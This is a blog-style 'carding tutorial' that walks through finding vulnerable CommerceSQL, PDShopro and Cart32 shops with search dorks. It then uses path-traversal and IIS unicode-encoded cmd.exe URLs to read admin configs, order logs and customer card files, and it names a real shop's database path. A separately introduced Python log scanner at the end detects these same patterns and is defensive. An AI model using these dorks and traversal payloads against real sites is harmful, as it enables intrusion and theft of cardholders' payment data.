Carding Tutorial

E-Commerce

1. Find target Website commerceSQL at google.com, with keyword :

allinurl:/commercesql/

2. For example we get target with url :

http://www.example.com/commercesql/blablabla

3. Replace the URL to be :

-> www.example.com/cgi-bin/commercesql/index.cgi?page=

4. Example to see admin config

-> www.example.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl

5. Example to see admin manager

http://www.example.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi

6. To see file log/ccnya ->

http://www.example.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log

7. Done


PDShopro

1. Find target Website PDshopro at google.com, with keyword allinurl:/shop/category.asp/
catid=

2. First we have to watch the database configuration by replacing the URL to be: www.example.com/admin/dbsetup.asp

3. Target example : http://www.marktwainbooks.com/admin/dbsetup.asp

4. We will get the name of the database : sdatapdshoppro.mdb

5. Now to download sdatapdshoppro.mdb file, you can replace the URL to be : http:// www.marktwainbooks.com/data/pdshoppro.mdb

6. Open file .mdb- using Microsoft Access

7. Good luck !

Cart32

1. Find target at www.google.com with keyword allinurl:/cart32.exe/

2. For example we have target with url:
http://www.example.com/scripts/cart32.exe/blablabla

3. Replace that url to be -> http://www.example.com/scripts/

4. Modify that url with unicode at the end -> http://www.example.com/scripts/

5. example unicode for path /scripts/ : -->

/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\

For path /cgi-bin/ ->
/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\

6. For example, if that URL uses the path /scripts/, then replace it with http://www.example.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\

7. End string unicode with dir+c:\ It means we are on the directory c server target!

8. For enter to the directory replace cc's unicode with -> http://www.example.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\

9. We will get output listing the .c32 files, for example: WRBURNS-001065.c32

10. For viewing the file with unicode http://www.example.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+type+c:\progra~1\mwainc\cart32\WRBURNS-001065.c32

11. If it doesn't work, you have to try with another unicode.

Note: go ahead and try one of the three methods above... if one of them works, don't misuse it, okay? Otherwise I'll delete all the hacking knowledge I have on this blog....
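The request patterns listed above, seen from the defender's side, as an added example that is not part of the original post: it canonicalizes each request target (repeated percent-decoding, then folding overlong UTF-8 to ASCII) and flags traversal, double encoding and overlong sequences in access-log lines. The log format, the sample lines and all function names are assumptions made for this example.

```python
import re
from urllib.parse import unquote_to_bytes

# Lead bytes C0/C1 never occur in valid UTF-8; they only encode ASCII "overlong".
OVERLONG = re.compile(rb"%c[01]%[89ab][0-9a-f]", re.I)
DOUBLE_ENC = re.compile(rb"%25[0-9a-f]{2}", re.I)         # %255c -> %5c -> "\"
TRAVERSAL = re.compile(rb"(?:^|[/\\=])\.\.(?:[/\\]|$)")    # ".." as a whole segment
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/')

def canonicalize(target: bytes, max_rounds: int = 5) -> bytes:
    """Percent-decode until stable, then fold overlong 2-byte sequences to ASCII."""
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(target)
        if decoded == target:
            break
        target = decoded
    return re.sub(rb"[\xc0\xc1][\x80-\xbf]",
                  lambda m: bytes([((m[0][0] & 0x1F) << 6) | (m[0][1] & 0x3F)]), target)

def classify(target: str) -> set:
    """Return the set of findings for one request target (path plus query)."""
    raw = target.encode("latin-1", "replace")
    findings = set()
    if OVERLONG.search(raw):
        findings.add("overlong_utf8")
    if DOUBLE_ENC.search(raw):
        findings.add("double_encoding")
    if TRAVERSAL.search(canonicalize(raw)):   # checked on the canonical form only
        findings.add("traversal")
    return findings

def scan(log_lines):
    """Yield (client, target, findings) for every log line with at least one finding."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if m and (found := classify(m.group(2))):
            hits.append((m.group(1), m.group(2), sorted(found)))
    return hits

# Constructed sample lines (documentation IP ranges, paths taken from the text above).
SAMPLE_LOG = [
    r'192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /shop/category.asp?catid=12 HTTP/1.1" 200 5120',
    r'192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /search?q=100%25+cotton HTTP/1.1" 200 2048',
    r'203.0.113.5 - - [01/Jan/2024:10:01:00 +0000] "GET /cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl HTTP/1.0" 200 900',
    r'203.0.113.5 - - [01/Jan/2024:10:01:09 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 0',
    r'203.0.113.7 - - [01/Jan/2024:10:02:00 +0000] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 0',
]
```

Matching on the canonical form is the point: a filter that inspects only the raw or once-decoded URL misses every encoded variant in the lists above, so the server must apply its path checks after the final decode.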